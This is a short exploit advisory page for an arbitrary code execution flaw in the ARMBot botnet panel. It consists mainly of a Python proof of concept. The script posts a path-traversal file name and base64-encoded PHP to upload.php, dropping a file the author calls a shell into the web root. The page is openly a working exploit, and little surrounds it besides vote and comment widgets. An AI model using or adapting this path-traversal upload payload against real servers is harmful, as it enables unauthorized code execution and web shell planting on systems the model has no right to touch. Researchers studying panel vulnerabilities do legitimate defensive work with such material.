ARMBot Botnet Arbitrary Code Execution

2019.08.06
Credit: prsecurity
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

import requests URL = "http://127.0.0.1/ARMBot/upload.php" r = requests.post(URL, data = { "file":"../public_html/lol/../.s.phtml", # need some trickery for each server ;) "data":"PD9waHAgZWNobyAxOyA/Pg==", # <?php echo 1; ?> "message":"Bobr Dobr" }, proxies={"http":"127.0.0.1:8080","https":"127.0.0.1:8080"}) print(r.status_code) print("shell should be at http://{}/.s.phtml".format(URL))


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top